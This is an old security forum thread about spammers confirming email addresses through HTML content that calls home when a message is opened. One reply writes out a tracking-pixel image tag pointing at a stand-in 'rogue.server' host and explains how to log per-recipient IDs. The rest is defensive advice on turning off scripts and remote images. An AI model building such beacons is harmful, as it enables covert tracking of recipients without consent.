How spammers can confirm your email address without you even responding.

Printable View

November 7th, 2005, 05:07 AM
Overlord_77520

How spammers can confirm your email address without you even responding.

I have found a way for a spammer to confirm an email address is valid without the user even responding to it. Here is how it is done. An email with an html form with hidden values is sent to the unfortunate reciepient. A JavaScript is inserted to acquire information such as the screen dimmensions, browser and operating version. The email software the puts the email and all the Javascript information plus the email address into hidden fields. This JavaScript is loaded when the email is opened and the JavaScript function sends the html form back to the spammer. Then on the spammer side, he uses Perl to get statistics such as IP Adress and UserID. VIOLA! THE SPAMMER AS A CONFIRMED EMAIL ADDRESS AND IMPORTANT DEMOGRAPHIC INFORMATION JUST RIPE FOR EXPOILTATION.

The Moral of the Story::::
DON'T HAVE JAVASCRIPT ENABLED ON YOUR EMAIL!!!!
November 7th, 2005, 10:48 AM
SirDice

Quote:

I have found a way for a spammer to confirm an email address is valid without the user even responding to it.

It's been used and abused before.. You're not the first one to think of this.

Why use javascript? It's, by default, turned off in todays mailclients..

Something like a remote image will do the trick quite nicely too..

Code:

<img src=http://rogue.server/pic.php?id=123456787>

Generate a new ID for every email send.. Use a database or something to log ID->email address relation.. Create pic.php to log the ID (and everything else you want) and make it return a GIF/JPG..

Unless ofcourse remote images are turned off in the mailclient the user only has to open/read the email.
November 7th, 2005, 11:15 AM
therenegade

Wouldn't the better moral be 'Don't open email from people you don't know'?:D
November 7th, 2005, 11:20 AM
SirDice

Quote:

Originally posted here by therenegade
Wouldn't the better moral be 'Don't open email from people you don't know'?:D

Good point.. But... A lot of virusses/worms come from friends and family.. Sometimes spam too (faked email from: address)..
November 7th, 2005, 11:40 AM
therenegade

Quote:

Originally posted here by SirDice
But... A lot of virusses/worms come from friends and family.. Sometimes spam too (faked email from: address)..

Which is when we fall back on to the "Don't open attachments you're not really sure of' rule..admittedly,this fails in lieu of the average home user...as does enforcing a strict security policy(I don't think I've seen too many who surf from non-admin accounts...actually,I think a lot of them don't even know that there're other types of accounts...or that they're on an admin account)..unfortunately it's what's happening in a lot of homes all over today..which is why we go back to 'Get an AV and keep it updated.'
November 7th, 2005, 06:08 PM
SirDice

The average home user is also the reason why remote images and javascript are turned off by default ;)
November 7th, 2005, 06:16 PM
treanglin

The best way to view all e-mails , in my experience, is in a text only mode. All of the mail clients I use convert html messages to text only mesages. and then they give you the option to view the html version if you want.
November 7th, 2005, 06:34 PM
therenegade

True SirDice...but the average user ever so often has the tendency to try and enable it for percieved 'added functionality'(read as chat,pr0n whatever;) )